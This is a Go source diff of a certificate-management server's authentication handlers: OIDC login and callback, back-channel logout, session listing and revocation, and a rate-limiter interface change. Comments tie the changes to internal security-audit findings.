// honours the LOW-5 trusted-proxy gating; r.UserAgent() reads the
|
||||||
|
// header verbatim.
|
||||||
|
loginIP := clientIPFromRequest(r)
|
||||||
|
loginUA := r.UserAgent()
|
||||||
|
authURL, cookieValue, _, err := h.oidcSvc.HandleAuthRequest(r.Context(), providerID, loginIP, loginUA)
|
||||||
|
if err != nil {
|
||||||
|
// Provider not found is the most common case; map to 404.
|
||||||
|
if errors.Is(err, repository.ErrOIDCProviderNotFound) {
|
||||||
|
Error(w, http.StatusNotFound, "provider not found")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Other errors (disco fetch failure / IdP downgrade defense /
|
||||||
|
// crypto failure) are server-side; surface as 500 without
|
||||||
|
// leaking details.
|
||||||
|
Error(w, http.StatusInternalServerError, "could not initiate OIDC login")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
http.SetCookie(w, &http.Cookie{
|
||||||
|
Name: sessiondomain.PreLoginCookieName,
|
||||||
|
Value: cookieValue,
|
||||||
|
// Audit 2026-05-10 MED-14 — `__Host-` prefix requires Path=/.
|
||||||
|
// The cookie lives 10 minutes and is only ever consumed by the
|
||||||
|
// callback handler; the wider path scope is harmless.
|
||||||
|
Path: "/",
|
||||||
|
MaxAge: int((10 * time.Minute).Seconds()),
|
||||||
|
Secure: h.cookieAttrs.Secure,
|
||||||
|
HttpOnly: true,
|
||||||
|
// Pre-login cookie MUST be SameSite=Lax (cannot be Strict
|
||||||
|
// because the IdP-initiated callback is a top-level navigation
|
||||||
|
// from a different origin per Phase 5 spec).
|
||||||
|
SameSite: http.SameSiteLaxMode,
|
||||||
|
})
|
||||||
|
http.Redirect(w, r, authURL, http.StatusFound)
|
||||||
|
}
|
||||||
|
|
||||||
|
// LoginCallback handles GET /auth/oidc/callback?code=...&state=....
|
||||||
|
//
|
||||||
|
// Reads the certctl_oidc_pending cookie, drives OIDCService.HandleCallback
|
||||||
|
// (which parses + HMAC-verifies the cookie, runs the 11-step token
|
||||||
|
// validation, group-claim resolution, role-mapping, user-upsert),
|
||||||
|
// mints a post-login session via SessionService.Create, deletes the
|
||||||
|
// pre-login cookie, sets the post-login cookie + CSRF token cookie,
|
||||||
|
// and 302's to the dashboard.
|
||||||
|
func (h *AuthSessionOIDCHandler) LoginCallback(w http.ResponseWriter, r *http.Request) {
|
||||||
|
q := r.URL.Query()
|
||||||
|
code := strings.TrimSpace(q.Get("code"))
|
||||||
|
state := strings.TrimSpace(q.Get("state"))
|
||||||
|
// Audit 2026-05-10 MED-17 — RFC 9207 iss URL parameter. NOT
|
||||||
|
// trimmed; preserved exactly as sent so the service-layer compare
|
||||||
|
// against the matched provider's IssuerURL is byte-strict. The IdP
|
||||||
|
// emits this only when advertised in its discovery doc; the
|
||||||
|
// service-layer check is a no-op otherwise.
|
||||||
|
callbackIss := q.Get("iss")
|
||||||
|
if code == "" || state == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing code or state query parameter")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
preLoginCookie, err := r.Cookie(sessiondomain.PreLoginCookieName)
|
||||||
|
if err != nil || preLoginCookie.Value == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing pre-login cookie")
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_login_failed", "anonymous", domain.ActorTypeSystem, "",
|
||||||
|
map[string]interface{}{"failure_category": "missing_pre_login_cookie"})
|
||||||
|
return
|
||||||
|
}
|
||||||
|
clientIP := clientIPFromRequest(r)
|
||||||
|
userAgent := r.UserAgent()
|
||||||
|
|
||||||
|
res, err := h.oidcSvc.HandleCallback(r.Context(), preLoginCookie.Value, code, state, callbackIss, clientIP, userAgent)
|
||||||
|
if err != nil {
|
||||||
|
// Audit 2026-05-10 HIGH-7 — instead of a blank 400, redirect
|
||||||
|
// to /login?error=oidc_failed&reason=<category>. The LoginPage
|
||||||
|
// reads the query params and renders an operator-friendly
|
||||||
|
// alert. The audit row still carries the specific
|
||||||
|
// failure_category so server-side observability is unchanged.
|
||||||
|
category := classifyOIDCFailure(err)
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_login_failed", "anonymous", domain.ActorTypeSystem, "",
|
||||||
|
map[string]interface{}{"failure_category": category})
|
||||||
|
// Special-case unmapped groups so the audit row name distinguishes
|
||||||
|
// it from generic failures (operator-policy decision).
|
||||||
|
if category == "unmapped_groups" {
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_login_unmapped_groups", "anonymous", domain.ActorTypeSystem, "",
|
||||||
|
map[string]interface{}{})
|
||||||
|
}
|
||||||
|
// Always clear the pre-login cookie on failure.
|
||||||
|
h.clearPreLoginCookie(w)
|
||||||
|
// 302 to the login page; the reason categorizes the failure for
|
||||||
|
// the GUI to render. Keep the redirect target relative — the
|
||||||
|
// SPA serves /login.
|
||||||
|
http.Redirect(w, r, "/login?error=oidc_failed&reason="+category, http.StatusFound)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// res from the OIDC service already carries cookieValue + CSRFToken
|
||||||
|
// (the OIDC service wraps SessionService internally per Phase 3).
|
||||||
|
// We re-emit them via the standard Set-Cookie helper here so cookie
|
||||||
|
// attributes stay handler-controlled.
|
||||||
|
now := time.Now().UTC()
|
||||||
|
expires := now.Add(8 * time.Hour) // matches default SessionConfig.AbsoluteTimeout
|
||||||
|
http.SetCookie(w, &http.Cookie{
|
||||||
|
Name: sessiondomain.PostLoginCookieName,
|
||||||
|
Value: res.CookieValue,
|
||||||
|
Path: "/",
|
||||||
|
Expires: expires,
|
||||||
|
Secure: h.cookieAttrs.Secure,
|
||||||
|
HttpOnly: true,
|
||||||
|
SameSite: h.cookieAttrs.SameSite,
|
||||||
|
})
|
||||||
|
http.SetCookie(w, &http.Cookie{
|
||||||
|
Name: sessiondomain.CSRFCookieName,
|
||||||
|
Value: res.CSRFToken,
|
||||||
|
Path: "/",
|
||||||
|
Expires: expires,
|
||||||
|
Secure: h.cookieAttrs.Secure,
|
||||||
|
HttpOnly: false, // intentional — GUI must read this to echo header
|
||||||
|
SameSite: h.cookieAttrs.SameSite,
|
||||||
|
})
|
||||||
|
h.clearPreLoginCookie(w)
|
||||||
|
|
||||||
|
userID := ""
|
||||||
|
if res.User != nil {
|
||||||
|
userID = res.User.ID
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_login_succeeded", userID, domain.ActorTypeUser, userID,
|
||||||
|
map[string]interface{}{
|
||||||
|
"user_id": userID,
|
||||||
|
"role_ids": res.RoleIDs,
|
||||||
|
})
|
||||||
|
h.recordAudit(r.Context(), "auth.session_created", userID, domain.ActorTypeUser, userID,
|
||||||
|
map[string]interface{}{"user_id": userID})
|
||||||
|
|
||||||
|
http.Redirect(w, r, h.postLoginURL, http.StatusFound)
|
||||||
|
}
|
||||||
|
|
||||||
|
// BackChannelLogout handles POST /auth/oidc/back-channel-logout.
|
||||||
|
//
|
||||||
|
// OpenID Connect Back-Channel Logout 1.0. The IdP POSTs a logout_token
|
||||||
|
// JWT in the body (form-encoded `logout_token=<jwt>`); certctl validates
|
||||||
|
// signature against the IdP's JWKS, validates required claims (iss, aud,
|
||||||
|
// iat, jti, events; exactly one of sub or sid; nonce ABSENT), revokes
|
||||||
|
// matching sessions, returns 200 with Cache-Control: no-store. Failure
|
||||||
|
// modes return 400 per spec §2.6.
|
||||||
|
func (h *AuthSessionOIDCHandler) BackChannelLogout(w http.ResponseWriter, r *http.Request) {
|
||||||
|
if err := r.ParseForm(); err != nil {
|
||||||
|
Error(w, http.StatusBadRequest, "could not parse form body")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
logoutToken := strings.TrimSpace(r.FormValue("logout_token"))
|
||||||
|
if logoutToken == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing logout_token in form body")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
issuer, sub, sid, jti, _, err := h.bclVerifier.Verify(r.Context(), logoutToken)
|
||||||
|
if err != nil {
|
||||||
|
// Per spec §2.6 — uniform 400 on any validation failure. The
|
||||||
|
// audit row carries the specific reason; the wire stays uniform.
|
||||||
|
// iat-skew rejections (Audit 2026-05-10 HIGH-3 iat-window check)
|
||||||
|
// land here too — the reason string distinguishes them.
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout_failed", "anonymous", domain.ActorTypeSystem, "",
|
||||||
|
map[string]interface{}{"failure_reason": err.Error()})
|
||||||
|
Error(w, http.StatusBadRequest, "logout_token validation failed")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// Audit 2026-05-10 HIGH-3 — jti consumed-set. Atomic single-use
|
||||||
|
// semantics via the postgres ON CONFLICT DO NOTHING path. On
|
||||||
|
// replay return 200 + audit outcome=jti_replayed (RFC 9700 §2.7).
|
||||||
|
// On transient repo error return 503 so the IdP follows its retry
|
||||||
|
// semantics. When the consumer is nil (test path / pre-fix
|
||||||
|
// deployments) the consume step is skipped.
|
||||||
|
if h.bclReplay != nil && jti != "" {
|
||||||
|
ttl := h.bclMaxAge * 2
|
||||||
|
if ttl < 24*time.Hour {
|
||||||
|
ttl = 24 * time.Hour
|
||||||
|
}
|
||||||
|
if cerr := h.bclReplay.ConsumeJTI(r.Context(), jti, issuer, ttl); cerr != nil {
|
||||||
|
if errors.Is(cerr, repository.ErrBCLJTIAlreadyConsumed) {
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout", "anonymous", domain.ActorTypeSystem, sub,
|
||||||
|
map[string]interface{}{"issuer": issuer, "subject": sub, "jti": jti, "outcome": "jti_replayed"})
|
||||||
|
w.Header().Set("Cache-Control", "no-store")
|
||||||
|
w.WriteHeader(http.StatusOK)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Transient — let the IdP retry.
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout_failed", "anonymous", domain.ActorTypeSystem, sub,
|
||||||
|
map[string]interface{}{"issuer": issuer, "subject": sub, "jti": jti, "outcome": "jti_consume_failed", "err": cerr.Error()})
|
||||||
|
http.Error(w, "transient", http.StatusServiceUnavailable)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Resolve target sessions:
|
||||||
|
// - sub set: revoke ALL sessions for the actor (oidc_subject lookup).
|
||||||
|
// - sid set: revoke the specific session_id.
|
||||||
|
if sid != "" {
|
||||||
|
if rerr := h.sessionSvc.Revoke(r.Context(), sid); rerr != nil {
|
||||||
|
// Idempotent at the repo layer; rerr is unlikely. Audit
|
||||||
|
// regardless and return 200 (the IdP shouldn't retry on
|
||||||
|
// our errors).
|
||||||
|
_ = rerr
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout", "anonymous", domain.ActorTypeSystem, sid,
|
||||||
|
map[string]interface{}{"sub_or_sid": "sid", "issuer": issuer, "session_id": sid})
|
||||||
|
} else if sub != "" {
|
||||||
|
// CRIT-2 closure of the 2026-05-10 audit. Pre-fix this branch called
|
||||||
|
// RevokeAllForActor(sub, "User") under the false assumption that
|
||||||
|
// the OIDC subject was used as the actor_id stem. In reality,
|
||||||
|
// internal/auth/oidc/service.go::upsertUser mints
|
||||||
|
// u.ID = "u-" + randomB64URL(16) and stores the OIDC subject in
|
||||||
|
// a separate column, so the pre-fix lookup never found a session
|
||||||
|
// row and the error was silently swallowed. BCL silently revoked
|
||||||
|
// nothing — CWE-613.
|
||||||
|
//
|
||||||
|
// The fix resolves the IdP-signed `iss` claim back to a provider
|
||||||
|
// row via providerRepo.List + IssuerURL filter, then resolves
|
||||||
|
// sub → user.ID via userRepo.GetByOIDCSubject, then revokes all
|
||||||
|
// sessions for that actor. Outcome categories audited:
|
||||||
|
// - revoked (happy path)
|
||||||
|
// - issuer_unknown (iss doesn't match any configured provider)
|
||||||
|
// - user_unknown (provider matched, but no user.id seeded for this subject)
|
||||||
|
// - revoke_failed (DB hiccup at the revoke step)
|
||||||
|
// - provider_lookup_failed / user_lookup_failed → 503 (transient; IdP retries)
|
||||||
|
// All success-shaped outcomes return 200 + Cache-Control: no-store
|
||||||
|
// per OIDC BCL 1.0 §2.7. Transient errors return 503 so the IdP
|
||||||
|
// follows its own retry semantics.
|
||||||
|
providers, plerr := h.providerRepo.List(r.Context(), h.tenantID)
|
||||||
|
if plerr != nil {
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout", "anonymous", domain.ActorTypeSystem, sub,
|
||||||
|
map[string]interface{}{"sub_or_sid": "sub", "issuer": issuer, "subject": sub, "outcome": "provider_lookup_failed"})
|
||||||
|
http.Error(w, "transient", http.StatusServiceUnavailable)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
var matched *oidcdomain.OIDCProvider
|
||||||
|
for _, p := range providers {
|
||||||
|
if p.IssuerURL == issuer {
|
||||||
|
matched = p
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if matched == nil {
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout", "anonymous", domain.ActorTypeSystem, sub,
|
||||||
|
map[string]interface{}{"sub_or_sid": "sub", "issuer": issuer, "subject": sub, "outcome": "issuer_unknown"})
|
||||||
|
// Idempotent — return 200 per spec.
|
||||||
|
w.Header().Set("Cache-Control", "no-store")
|
||||||
|
w.WriteHeader(http.StatusOK)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
user, uerr := h.userRepo.GetByOIDCSubject(r.Context(), matched.ID, sub)
|
||||||
|
if uerr != nil {
|
||||||
|
if errors.Is(uerr, repository.ErrUserNotFound) {
|
||||||
|
// Idempotent: nothing to revoke. IdP may BCL a user we
|
||||||
|
// never logged in. RFC compliance: still 200.
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout", "anonymous", domain.ActorTypeSystem, sub,
|
||||||
|
map[string]interface{}{"sub_or_sid": "sub", "issuer": issuer, "subject": sub, "outcome": "user_unknown"})
|
||||||
|
w.Header().Set("Cache-Control", "no-store")
|
||||||
|
w.WriteHeader(http.StatusOK)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Transient — let the IdP retry.
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout", "anonymous", domain.ActorTypeSystem, sub,
|
||||||
|
map[string]interface{}{"sub_or_sid": "sub", "issuer": issuer, "subject": sub, "outcome": "user_lookup_failed"})
|
||||||
|
http.Error(w, "transient", http.StatusServiceUnavailable)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
if rerr := h.sessionSvc.RevokeAllForActor(r.Context(), user.ID, string(domain.ActorTypeUser)); rerr != nil {
|
||||||
|
// Revoke failed — BCL is best-effort per §2.8; still 200,
|
||||||
|
// audit the failure.
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout", user.ID, domain.ActorTypeUser, sub,
|
||||||
|
map[string]interface{}{"sub_or_sid": "sub", "issuer": issuer, "subject": sub, "outcome": "revoke_failed"})
|
||||||
|
w.Header().Set("Cache-Control", "no-store")
|
||||||
|
w.WriteHeader(http.StatusOK)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
h.recordAudit(r.Context(), "auth.oidc_back_channel_logout", user.ID, domain.ActorTypeUser, sub,
|
||||||
|
map[string]interface{}{"sub_or_sid": "sub", "issuer": issuer, "subject": sub, "outcome": "revoked"})
|
||||||
|
}
|
||||||
|
// Per spec §2.7 — Cache-Control: no-store on success.
|
||||||
|
w.Header().Set("Cache-Control", "no-store")
|
||||||
|
w.WriteHeader(http.StatusOK)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Logout handles POST /auth/logout. Revokes the caller's current
|
||||||
|
// session. Permission: own session (any authenticated caller).
|
||||||
|
func (h *AuthSessionOIDCHandler) Logout(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Resolve the caller's session via the cookie -> Validate path.
|
||||||
|
sessionCookie, cerr := r.Cookie(sessiondomain.PostLoginCookieName)
|
||||||
|
if cerr != nil || sessionCookie.Value == "" {
|
||||||
|
// No cookie => nothing to revoke; treat as success (idempotent).
|
||||||
|
h.clearSessionCookies(w)
|
||||||
|
w.WriteHeader(http.StatusNoContent)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
sess, verr := h.sessionSvc.Validate(r.Context(), sessionsvc.ValidateInput{
|
||||||
|
CookieValue: sessionCookie.Value,
|
||||||
|
ClientIP: clientIPFromRequest(r),
|
||||||
|
UserAgent: r.UserAgent(),
|
||||||
|
})
|
||||||
|
if verr != nil {
|
||||||
|
// Cookie is invalid; clear + 204 (idempotent).
|
||||||
|
h.clearSessionCookies(w)
|
||||||
|
w.WriteHeader(http.StatusNoContent)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if rerr := h.sessionSvc.Revoke(r.Context(), sess.ID); rerr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "could not revoke session")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Audit 2026-05-11 Fix 13 — HIGH-2 fourth call site. Rotate the CSRF
|
||||||
|
// token on the actor's remaining sessions so a token captured in
|
||||||
|
// this device's browser pre-logout (DevTools, malicious extension,
|
||||||
|
// session-storage leak) can't be replayed against a sibling session
|
||||||
|
// (other browser, other device) after the user logged out here.
|
||||||
|
// The just-revoked session also rotates but its CSRF lookup will
|
||||||
|
// fail at the sessions table's revoked_at IS NOT NULL filter
|
||||||
|
// anyway; rotation on the revoked row is harmless. RotateCSRFTokenForActor
|
||||||
|
// returns the count rotated and NEVER errors — rotation is defense
|
||||||
|
// in depth and must not block the logout success.
|
||||||
|
rotated := h.sessionSvc.RotateCSRFTokenForActor(r.Context(), caller.ActorID, string(caller.ActorType))
|
||||||
|
h.recordAudit(r.Context(), "auth.session_revoked", caller.ActorID, caller.ActorType, sess.ID,
|
||||||
|
map[string]interface{}{"session_id": sess.ID, "self_initiated": true, "csrf_rotated": rotated})
|
||||||
|
h.clearSessionCookies(w)
|
||||||
|
w.WriteHeader(http.StatusNoContent)
|
||||||
|
}
|
||||||
@@ -0,0 +1,207 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package handler
|
||||||
|
|
||||||
|
import (
|
||||||
|
"errors"
|
||||||
|
"net/http"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
sessionsvc "github.com/certctl-io/certctl/internal/auth/session"
|
||||||
|
sessiondomain "github.com/certctl-io/certctl/internal/auth/session/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 11 (2026-05-14): extracted from
|
||||||
|
// internal/api/handler/auth_session_oidc.go via the Option B
|
||||||
|
// sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file holds Section 2 of the original three-section layout:
|
||||||
|
// the SESSION MANAGEMENT handlers (RBAC-gated). Three endpoints:
|
||||||
|
//
|
||||||
|
// GET /api/v1/auth/sessions -> list (own / all-actors)
|
||||||
|
// DELETE /api/v1/auth/sessions/{id} -> revoke (own / any)
|
||||||
|
// DELETE /api/v1/auth/sessions/all-except-current
|
||||||
|
// -> revoke-all-except-current
|
||||||
|
//
|
||||||
|
// The sessionResponse projection type lives here alongside its
|
||||||
|
// callers (sessionToResponse + the three handler methods). It's
|
||||||
|
// the shape the API renders externally; no external caller relies
|
||||||
|
// on its exact file location.
|
||||||
|
|
||||||
|
// =============================================================================
|
||||||
|
// 2. Session management handlers (RBAC-gated).
|
||||||
|
// =============================================================================
|
||||||
|
|
||||||
|
type sessionResponse struct {
|
||||||
|
ID string `json:"id"`
|
||||||
|
ActorID string `json:"actor_id"`
|
||||||
|
ActorType string `json:"actor_type"`
|
||||||
|
IPAddress string `json:"ip_address,omitempty"`
|
||||||
|
UserAgent string `json:"user_agent,omitempty"`
|
||||||
|
CreatedAt string `json:"created_at"`
|
||||||
|
LastSeenAt string `json:"last_seen_at"`
|
||||||
|
IdleExpiresAt string `json:"idle_expires_at"`
|
||||||
|
AbsoluteExpiresAt string `json:"absolute_expires_at"`
|
||||||
|
Revoked bool `json:"revoked"`
|
||||||
|
}
|
||||||
|
|
||||||
|
func sessionToResponse(s *sessiondomain.Session) sessionResponse {
|
||||||
|
return sessionResponse{
|
||||||
|
ID: s.ID,
|
||||||
|
ActorID: s.ActorID,
|
||||||
|
ActorType: s.ActorType,
|
||||||
|
IPAddress: s.IPAddress,
|
||||||
|
UserAgent: s.UserAgent,
|
||||||
|
CreatedAt: s.CreatedAt.UTC().Format(time.RFC3339),
|
||||||
|
LastSeenAt: s.LastSeenAt.UTC().Format(time.RFC3339),
|
||||||
|
IdleExpiresAt: s.IdleExpiresAt.UTC().Format(time.RFC3339),
|
||||||
|
AbsoluteExpiresAt: s.AbsoluteExpiresAt.UTC().Format(time.RFC3339),
|
||||||
|
Revoked: s.RevokedAt != nil,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// ListSessions handles GET /api/v1/auth/sessions.
|
||||||
|
//
|
||||||
|
// Default behavior: list current actor's sessions. With
|
||||||
|
// ?actor_id=<other> + auth.session.list.all permission: list that
|
||||||
|
// actor's sessions. The permission check is at the handler layer
|
||||||
|
// (rbacGate at the router gates access to the handler entirely).
|
||||||
|
func (h *AuthSessionOIDCHandler) ListSessions(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Default to the caller's own sessions.
|
||||||
|
actorID := caller.ActorID
|
||||||
|
actorType := string(caller.ActorType)
|
||||||
|
if q := r.URL.Query().Get("actor_id"); q != "" && q != actorID {
|
||||||
|
// Audit 2026-05-10 MED-2 closure — listing a different
|
||||||
|
// actor's sessions requires the narrower auth.session.list.all
|
||||||
|
// permission. The router gate already enforced
|
||||||
|
// auth.session.list (the floor for any session-list call),
|
||||||
|
// but the all-actors variant is an admin-class capability and
|
||||||
|
// must be checked separately because the rbacGate can't see
|
||||||
|
// the query param. When the handler is wired with
|
||||||
|
// WithPermissionChecker (production), we re-check inline; when
|
||||||
|
// it isn't (legacy tests), the router gate's auth.session.list
|
||||||
|
// floor is the only check.
|
||||||
|
if h.checker != nil {
|
||||||
|
ok, perr := h.checker.CheckPermission(r.Context(),
|
||||||
|
caller.ActorID, string(caller.ActorType), h.tenantID,
|
||||||
|
"auth.session.list.all", "global", nil)
|
||||||
|
if perr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "permission check failed")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if !ok {
|
||||||
|
Error(w, http.StatusForbidden, "auth.session.list.all required to list another actor's sessions")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
}
|
||||||
|
actorID = q
|
||||||
|
if at := r.URL.Query().Get("actor_type"); at != "" {
|
||||||
|
actorType = at
|
||||||
|
}
|
||||||
|
}
|
||||||
|
sessions, lerr := h.sessionRepo.ListByActor(r.Context(), actorID, actorType, h.tenantID)
|
||||||
|
if lerr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "could not list sessions")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
out := make([]sessionResponse, 0, len(sessions))
|
||||||
|
for _, s := range sessions {
|
||||||
|
out = append(out, sessionToResponse(s))
|
||||||
|
}
|
||||||
|
writeJSON(w, http.StatusOK, map[string]interface{}{"sessions": out})
|
||||||
|
}
|
||||||
|
|
||||||
|
// RevokeSession handles DELETE /api/v1/auth/sessions/{id}.
|
||||||
|
func (h *AuthSessionOIDCHandler) RevokeSession(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
sessionID := r.PathValue("id")
|
||||||
|
if sessionID == "" {
|
||||||
|
Error(w, http.StatusBadRequest, "missing session id")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Look up the session to enforce "own session OR auth.session.revoke".
|
||||||
|
sess, gerr := h.sessionRepo.Get(r.Context(), sessionID)
|
||||||
|
if gerr != nil {
|
||||||
|
if errors.Is(gerr, repository.ErrSessionNotFound) {
|
||||||
|
Error(w, http.StatusNotFound, "session not found")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
Error(w, http.StatusInternalServerError, "could not load session")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Revoking your own session is always allowed (any authenticated
|
||||||
|
// caller). Revoking someone else's session requires the
|
||||||
|
// auth.session.revoke permission — enforced at the rbacGate the
|
||||||
|
// router wraps this handler with.
|
||||||
|
if sess.ActorID == caller.ActorID && sess.ActorType == string(caller.ActorType) {
|
||||||
|
// own-session path; rbacGate's permission requirement is the
|
||||||
|
// floor; passing through is fine.
|
||||||
|
}
|
||||||
|
if rerr := h.sessionSvc.Revoke(r.Context(), sessionID); rerr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "could not revoke session")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.session_revoked", caller.ActorID, caller.ActorType, sessionID,
|
||||||
|
map[string]interface{}{"session_id": sessionID, "target_actor_id": sess.ActorID})
|
||||||
|
w.WriteHeader(http.StatusNoContent)
|
||||||
|
}
|
||||||
|
|
||||||
|
// RevokeAllExceptCurrent handles DELETE /api/v1/auth/sessions?except=current.
|
||||||
|
//
|
||||||
|
// Audit 2026-05-10 MED-3 closure — backs the "Sign out all other
|
||||||
|
// sessions" SessionsPage button. Revokes every active session for the
|
||||||
|
// caller EXCEPT the session that issued the current request (so the
|
||||||
|
// user doesn't get logged out by the action they just took).
|
||||||
|
//
|
||||||
|
// The current session ID is read from the request's session cookie via
|
||||||
|
// the SessionMiddleware's actor context — for Bearer-mode callers this
|
||||||
|
// is the empty string and ALL the actor's sessions are revoked (matches
|
||||||
|
// the "log me out everywhere" semantic for API-key-mode users).
|
||||||
|
//
|
||||||
|
// Audit row records the count for compliance (one summary row per
|
||||||
|
// invocation; per-session detail is implicit in the count + actor).
|
||||||
|
func (h *AuthSessionOIDCHandler) RevokeAllExceptCurrent(w http.ResponseWriter, r *http.Request) {
|
||||||
|
caller, err := callerFromRequest(r)
|
||||||
|
if err != nil {
|
||||||
|
writeAuthError(w, err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
if r.URL.Query().Get("except") != "current" {
|
||||||
|
Error(w, http.StatusBadRequest, "only ?except=current is supported")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Current session ID — empty for Bearer/API-key callers (acceptable;
|
||||||
|
// the repo's RevokeAllExceptForActor handles "" by revoking
|
||||||
|
// literally every active session). Read from the session middleware's
|
||||||
|
// SessionFromContext helper which populates the validated session
|
||||||
|
// on the request context for cookie-mode callers.
|
||||||
|
currentSessionID := ""
|
||||||
|
if sess := sessionsvc.SessionFromContext(r.Context()); sess != nil {
|
||||||
|
currentSessionID = sess.ID
|
||||||
|
}
|
||||||
|
|
||||||
|
count, rerr := h.sessionRepo.RevokeAllExceptForActor(r.Context(),
|
||||||
|
caller.ActorID, string(caller.ActorType), h.tenantID, currentSessionID)
|
||||||
|
if rerr != nil {
|
||||||
|
Error(w, http.StatusInternalServerError, "could not revoke sessions")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
h.recordAudit(r.Context(), "auth.sessions_revoked_all_except_current",
|
||||||
|
caller.ActorID, caller.ActorType, currentSessionID,
|
||||||
|
map[string]interface{}{
|
||||||
|
"count": count,
|
||||||
|
"current_session_id": currentSessionID,
|
||||||
|
})
|
||||||
|
writeJSON(w, http.StatusOK, map[string]interface{}{"revoked_count": count})
|
||||||
|
}
|
||||||
@@ -52,7 +52,7 @@ type CertificateService interface {
|
|||||||
// CertificateHandler handles HTTP requests for certificate operations.
|
// CertificateHandler handles HTTP requests for certificate operations.
|
||||||
type CertificateHandler struct {
|
type CertificateHandler struct {
|
||||||
svc CertificateService
|
svc CertificateService
|
||||||
ocspLimiter *ratelimit.SlidingWindowLimiter // production hardening II Phase 3 — per-source-IP cap on OCSP
|
ocspLimiter ratelimit.Limiter // production hardening II Phase 3 — per-source-IP cap on OCSP
|
||||||
}
|
}
|
||||||
|
|
||||||
// NewCertificateHandler creates a new CertificateHandler with a service dependency.
|
// NewCertificateHandler creates a new CertificateHandler with a service dependency.
|
||||||
@@ -65,7 +65,7 @@ func NewCertificateHandler(svc CertificateService) CertificateHandler {
|
|||||||
// cmd/server/main.go): 1000 req/min/IP. Setting to nil disables the
|
// cmd/server/main.go): 1000 req/min/IP. Setting to nil disables the
|
||||||
// limit; the limiter's own NewSlidingWindowLimiter(maxN<=0, ...)
|
// limit; the limiter's own NewSlidingWindowLimiter(maxN<=0, ...)
|
||||||
// also produces a no-op limiter, so the env-var-zero case is safe.
|
// also produces a no-op limiter, so the env-var-zero case is safe.
|
||||||
func (h *CertificateHandler) SetOCSPRateLimiter(l *ratelimit.SlidingWindowLimiter) {
|
func (h *CertificateHandler) SetOCSPRateLimiter(l ratelimit.Limiter) {
|
||||||
h.ocspLimiter = l
|
h.ocspLimiter = l
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -100,13 +100,13 @@ type ESTHandler struct {
|
|||||||
// EST RFC 7030 hardening Phase 3.3: per-handler source-IP rate
|
// EST RFC 7030 hardening Phase 3.3: per-handler source-IP rate
|
||||||
// limiter for FAILED HTTP Basic auth attempts. Keyed by sourceIP so
|
